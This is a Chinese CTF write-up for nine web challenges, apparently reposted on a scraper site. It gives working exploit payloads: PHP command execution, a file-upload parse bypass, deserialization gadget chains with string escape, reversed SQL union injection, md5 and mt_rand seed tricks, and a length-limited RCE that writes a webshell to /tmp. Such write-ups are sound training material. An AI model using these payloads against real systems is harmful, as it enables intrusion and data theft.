当前位置: 首页 > news >正文

有自己的域名怎么建立网站上海哪家做网站关键词排名

有自己的域名怎么建立网站,上海哪家做网站关键词排名,爱办app下载,公司做营销型网站目录 ①websign ②ez_rce ③ez_upload ④ez_unser ⑤ezsql ⑥ezpop ⑦funmd5 ⑧phonecode ⑨ezrce ①websign 右键打不开#xff0c;直接抓包发包看源码 ②ez_rce “反引号” 在PHP中会被当作SHELL命令执行 ?codeprintf(l\s /); ?codeprintf(ta\c /ffffffffffl…目录 ①websign ②ez_rce ③ez_upload  ④ez_unser  ⑤ezsql ⑥ezpop ⑦funmd5 ⑧phonecode ⑨ezrce ①websign 右键打不开直接抓包发包看源码 ②ez_rce “反引号” 在PHP中会被当作SHELL命令执行  ?codeprintf(l\s /); ?codeprintf(ta\c /fffffffffflagafag); ③ez_upload  先随便输点东西报错发现是apache 文件上传有关php的后缀都被ban了于是考虑上传.htaccess然而禁止上传该类型文件。 尝试利用 Apache解析漏洞 Apache解析漏洞主要是因为Apache默认一个文件可以有多个用.分割得后缀当最右边的后缀无法识别mime.types文件中的为合法后缀则继续向左看直到碰到合法后缀才进行解析以最后一个合法后缀为准,可用来绕过黑名单过滤。 ④ez_unser  这里__wakeup不能通过修改属性个数来绕过 所以利用$this-b$this-c 构造 ?php class test{public $a;public $b;public $c;public function __construct(){}public function __wakeup(){$this-a;}public function __destruct(){$this-b$this-c;eval($this-a);} } $anew test(); $a-b$a-a; $a-csystem(tac /fffffffffflagafag);; echo serialize($a);? 先触发__wakeup后触发__destruct让a的值等于c的值  payload: ?aO:4:test:3:{s:1:a;N;s:1:b;R:2;s:1:c;s:33:system(tac /fffffffffflagafag);;} ⑤ezsql 先是万能密码试一试 1 or 11# 通过回显知道了三个信息 注入点在passwd即可输入的payload被逆向闭合方式为) 字符串逆向的代码 s 需要逆向的字符串 r s[::-1] print(r) 注以下payload都是逆向之前的 1) or 11# 1) order by 2# 测出列数为2 1) union select 1,table_name from information_schema.tables where table_schemadatabase()# 发现or被过滤双写绕过即可 from-frroom 1) union select 1,table_name frroom information_schema.tables where table_schemadatabase() # # galfeman_elbat dna )(esabatadamehcs_elbat erehw snmuloc.amehcs_noitamrofni moorrf eman_nmuloc,1 tceles noinu )1 #galf moorrf FTCUU,1 tceles noinu )1  ⑥ezpop ?php //flag in flag.php error_reporting(0); class UUCTF{public $name,$key,$basedata,$ob;function __construct($str){$this-name$str;}function __wakeup(){if($this-keyUUCTF){$this-obunserialize(base64_decode($this-basedata));}else{die(oh!you should learn PHP unserialize String escape!);}} } class output{public $a;function __toString(){$this-a-rce();} } class nothing{public $a;public $b;public $t;function __wakeup(){$this-a;}function __destruct(){$this-b$this-t;die($this-a);} } class youwant{public $cmd;function rce(){eval($this-cmd);} } $pdata$_POST[data]; if(isset($pdata)) {$dataserialize(new UUCTF($pdata));$data_replacestr_replace(hacker,loveuu!,$data);unserialize($data_replace); }else{highlight_file(__FILE__); } ? 一眼字符串逃逸hacker-loveuu!增加一个字符 先随便构造 $anew UUCTF(suibian); echo serialize($a); O:5:UUCTF:4:{s:4:name;s:7:suibian;s:3:key;N;s:8:basedata;N;s:2:ob;N;} 字符串逃逸 ;s:3:key;s:5:UUCTF;s:8:basedata;s:xxx:xxxx;s:2:ob;N;}暂未知道需要逃逸多少个字符 先把局部的exp构造出来 先是搓链子 nothing::__wakeup|__destruct - output::__toString - youwant::rce() 构造 $anew nothing(); $bnew output(); $cnew youwant(); $a-a$a-b; $a-t$b; $b-a$c; $c-cmdsystem(cat flag.php);; echo base64_encode(serialize($a));//Tzo3OiJub3RoaW5nIjozOntzOjE6ImEiO047czoxOiJiIjtSOjI7czoxOiJ0IjtPOjY6Im91dHB1dCI6MTp7czoxOiJhIjtPOjc6InlvdXdhbnQiOjE6e3M6MzoiY21kIjtzOjIzOiJzeXN0ZW0oJ2NhdCBmbGFnLnBocCcpOyI7fX19 ;s:3:key;s:5:UUCTF;s:8:basedata;s:176:Tzo3OiJub3RoaW5nIjozOntzOjE6ImEiO047czoxOiJiIjtSOjI7czoxOiJ0IjtPOjY6Im91dHB1dCI6MTp7czoxOiJhIjtPOjc6InlvdXdhbnQiOjE6e3M6MzoiY21kIjtzOjIzOiJzeXN0ZW0oJ2NhdCBmbGFnLnBocCcpOyI7fX19;s:2:ob;N;} 共236个字符即需要236个hacker print(hacker*236) 最终payload: datahackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhacker;s:3:key;s:5:UUCTF;s:8:basedata;s:176:Tzo3OiJub3RoaW5nIjozOntzOjE6ImEiO047czoxOiJiIjtSOjI7czoxOiJ0IjtPOjY6Im91dHB1dCI6MTp7czoxOiJhIjtPOjc6InlvdXdhbnQiOjE6e3M6MzoiY21kIjtzOjIzOiJzeXN0ZW0oJ2NhdCBmbGFnLnBocCcpOyI7fX19;s:2:ob;N;}  ⑦funmd5 $md5preg_replace(/^(.)0e(.)$/,${1}no_science_notation!${2},$md5); if(preg_match(/0e/,$md5[0])) 两个条件是矛盾的但是我们可以%0a绕过preg_replace函数 自身与md5相等,对于0e215962017md5后也是以0e开头 因此md5[0]应该传入%0a0e215962017但是我们又多了一个%0a 换行符通过上面这行代码 $md5[0]substr($md5[0],$sub); 可以在 $sub1的时候执行会达到删去%0a的作用 $subsubstr($time,-1); $sub由$time决定$sub为$time的最后一位 $md5[1]$guessmd5后者是1秒一变的得写脚本了 import requests import time import hashlibs requests.session()while True:url http://node5.anna.nssctf.cn:28849/?md5[0]%0a0e215962017md5[1]{}.format(hashlib.md5(str(int(time.time())).encode(utf-8)).hexdigest())res s.get(urlurl).textprint(res)if well in res:print(res)breaktime.sleep(0.5) 跑出了flag ⑧phonecode 下一次必然命中联想到mt_rand()和mt_srand() 随机数种子 随便输点东西bp抓包发包看响应 ?php mt_srand(1); echo mt_rand().br/; #895547922 echo mt_rand().br/; #2141438069 ? hint是你输入种子的第一次随机数而code要输入的是第二次的随机数。 ⑨ezrce 输入whoami 输入1234567  测出来是限长6字符RCE 且回显告诉我们命令在tmp之下执行 CTF中字符长度限制下的命令执行 rce(7字符5字符4字符)汇总 import requests url http://node5.anna.nssctf.cn:28958/post.php print([]start attack!!!) with open(6rce.txt, r) as f:for i in f:data {cmd: f{i.strip()}}requests.post(urlurl, datadata)resp requests.get(http://node5.anna.nssctf.cn:28958/tmp/1.php) if resp.status_code requests.codes.ok:print([*]Attack success!!!) 6rce.txt内容 dir sl ht- f\ *v rev *v0 hp 1.p\\ d\\\ \ -\\ e64\\ bas\\ 7\|\\ XSk\\ Fsx\\ dFV\\ kX0\\ bCg\\ XZh\\ AgZ\\ waH\\ PD9\\ o\ \\ ech\\ sh 0 sh f 访问/tmp/1.php ?1system(tac /f*);即可拿到flag
http://www.zqtcl.cn/news/488524/

相关文章:

  • 专业做包包的网站好产品网站做营销推广
  • 网站刚建好怎么做能让百度收录湖北黄石网站建设
  • 网站建设拾金手指下拉二一wordpress 插件破解
  • 天津做网站外包公司有哪些美橙互联网站
  • 石家庄网站建设蓝点办公室装修工程
  • 申请网站空间就是申请域名建设机械网站咨询
  • 做美食网站有哪些网站怎么做自响应
  • 衡水网站建设维护宝安官网网站建设比较好的
  • 网站建设的审批重庆建设工程信息网30系统
  • 泉州软件开发培训机构怎么做网站内部链接的优化
  • 网站定位是什么中国it外包公司排名
  • 洛阳微信平台网站建设网站成功案例分析
  • 网站建设在淘宝怎么分类深圳软件开发招聘信息
  • .net如何做网站个人网站的制作
  • 网站优化排名推广站长统计官方网站
  • 长沙wap网站建设wordpress 用户 函数
  • 淮安做网站的公司有哪些公司目前上海有几个区
  • 怎么做自动跳转网站建站之星 discuz
  • 网站建设开发合同范本页面设计有哪几种风格
  • 重庆做网站重庆做网站做公司网站建设价格
  • 住房建设部官方网站公示公告国内卖到国外的电商平台
  • 安徽省建设厅网站巅川建设有限公司宁波城乡建设网站
  • 做财务还是网站运营wordpress主题 微博
  • 为什么要用CGI做网站网站建设 自学 电子版 pdf下载
  • 建设网站的规则营销型网站建设jm3q
  • 深圳建网站价格防水堵漏公司做网站效果怎样
  • 网站建设东莞老铁博客外国炫酷网站网址
  • 笔杆子写作网站牡丹江信息网0453免费发布信息
  • 网站建设介绍推广用语解释seo网站推广
  • 加盟企业网站建设目的速卖通下载app